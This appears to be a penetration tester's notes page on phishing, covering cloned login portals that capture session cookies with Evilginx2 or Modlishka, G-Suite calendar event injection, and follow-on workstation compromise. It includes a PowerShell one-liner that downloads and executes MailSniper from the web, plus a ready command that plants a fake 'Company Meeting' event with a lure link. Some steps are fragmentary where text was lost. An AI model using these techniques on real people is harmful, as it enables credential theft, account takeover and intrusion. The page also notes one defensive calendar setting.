Misconfigurations and vulnerable software are not the only way into a targets network. Phishing can be a very valuable wrench in your toolkit, its perfect to gather credentials, sessions or even shells.
Steal creds and/or session cookies. Can be useful when client has good prevention against shells.
Email a link to a target employee pointing to a cloned/proxied auth portal (Microsoft Online(O365, Azure), G-suite. AWS Console). When they auth they get a real session cookies, and so do we.
Tools: Evilginx2, Modlishka # MOVE TO OWN TOOL PAGE
When we get session we need to act fast and setup persistence.
G-Suite allowed for Calendar Event Injection. This allows a attacker to silently (without the need for a e-mail by using the API) inject a calendar entry to the users calender. This bypasses the “Don’t auto-add” options. Doing something like this will create urgency with a reminder notification.
This can be prevented by setting ‘Event settings -> Automatically add invitations’ to ‘No, only show invitations to which I have responded.’
while logged into your new account.https://console.developers.google.com/flows/enableapi?apiid=calendar&pli=1
. Then, click the Create button.https://developers.google.com/oauthplayground/
.PS C:\Users\justin-p> iex((iwr https://raw.githubusercontent.com/dafthack/MailSniper/master/MailSniper.ps1).content)
PS C:\Users\justin-p> Invoke-InjectGEventAPI -PrimaryEmail Injector@gmail.com -AccessToken 'TOKEN' -Targets "InjectToMe@gmail.com" -StartDateTime 2020-09-02T15:20:00 -EndDateTime 2020-09-02T15:30:00 -EventTitle "Company Meeting" -EventDescription "Please review the agenda at the URL below prior to the meeting. https://ElRandoUrl" -EventLocation "Zoom app goes Bzzzzzzzz"
Try to comprise workstations. This would (depending on the user) give access to internal and other cloud resources. Allows us to steal tokens from disk, preform session hijack/riding, start keyloggers and pivot in the network from this entry point.
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